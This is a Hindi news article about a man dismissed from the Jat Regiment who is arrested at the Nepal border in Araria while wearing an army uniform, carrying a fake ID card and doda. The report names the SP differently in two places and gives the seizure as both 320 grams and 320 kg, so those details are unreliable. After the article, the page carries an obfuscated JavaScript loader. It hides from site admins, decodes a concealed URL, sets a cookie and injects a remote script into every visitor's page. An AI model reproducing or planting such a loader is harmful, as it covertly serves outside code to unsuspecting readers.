सेना की वर्दी में था जवान, अचानक पुलिस ने मांगी तलाशी, बोला- ‘मेरा नाम….’ सुनते ही हिल गए अफसर

Araria Latest News : अररिया के नेपाल बॉर्डर पर आर्मी की वर्दी पहने हुए एक युवक जा रहा था. एसएसबी के जवानों को शक हुआ तो युवको को रोका और तलाशी देने को कहा. तलाशी की बात सुनते ही युवक नाराज हो गया. उसने कहा कि जाट रेजीमेंट का जवान है. जैसे ही युवक ने अपना नाम बताया, वहां पर मौजूद एसएसबी अफसरों में हड़कंप मच गया. आइये जानते हैं कि आगे क्या हुआ?

सतीश कुमार मिश्रा. अररिया. अररिया के नेपाल बॉर्डर जोगबनी में एसएसबी और पुलिस ने संयुक्त रूप से कार्रवाई करते हुए आर्मी से निकाले गए जवान को 320 ग्राम डोडा के साथ गिरफ्तार किया. डोडा से ही अफीम निकाला जाता है. अररिया एसपी सुधीर कुमार ने बताया कि गिरफ्तार आरोपी का नाम भागचंद चौधरी है जो राजस्थान का निवासी है. पूर्व में जाट रेजिमेंट का जवान था. इस जवान को अनुसाशनहीनता के कारण रेजिमेंट से निकाल दिया गया था. नेपाल बॉर्डर के जोगबनी में आर्मी का ड्रेस पहना हुआ था. वर्दी की हनक में मादक पदार्थ डोडा लेकर बॉर्डर पार करना चाह रहा था. गिरफ्तार आरोपी के पास से फर्जी पहचान पत्र मिला है. तलाशी में भागचंद के पास से आर्मी की दो वर्दी, एक टोपी, एक जूता, एक मोबाइल फोन, दो सिम और वोटर आईडी कार्ड भी बरामद हुआ.

जानकारी के मुताबिक, 11 जनवरी को नेपाल सीमा पर तैनात एसएसबी जवानों को आर्मी की वर्दी पहने एक एक संदिग्ध नजर आया. एसएसबी जवानों ने तलाशी देने को कहा तो वह बदतमीजी पर उतर आया. वह खुद को जाट रेजीमेंट का जवान बता रहा था. उसने कहा कि मेरे सामान की तलाशी मजिस्ट्रेट या किसी गजेटेड ऑफिसर के सामने ही करवाई जाए.
मौके पर मौजूद मजिस्ट्रेट के सामने जवान ने सेना का आईकार्ड दिखाया. जांच करने पर आईडी कार्ड फर्जी निकला. जवानों ने हिरासत में लेकर जोगबनी थाना पुलिस को सुपुर्द कर दिया. पूछताछ में गिरफ्तार व्यक्ति की पहचान राजस्थान के अजमेर जिला निवासी भागचंद चौधरी के रूप में हुई है.

अररिया एसपी अंजनी कुमार ने बताया, ‘सीमा पर गिरफ्तार किए गए शख्स के पास से 320 किलो डोडा-चूरा बरामद हुआ. आरोपी आर्मी का ड्रेस पहने हुए था.तलाशी में आरोपी के पास से फर्जी आईकार्ड भी मिला. उसने बताया कि वह जाट रेजीमेंट में आर्मी का जवान था. गलत आचरण के कारण सेना से निकाल दिया गया था. अजमेर का रहने वाला है. आरोपी के खिलाफ कानूनी कार्रवाई की जा रही है।’





(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply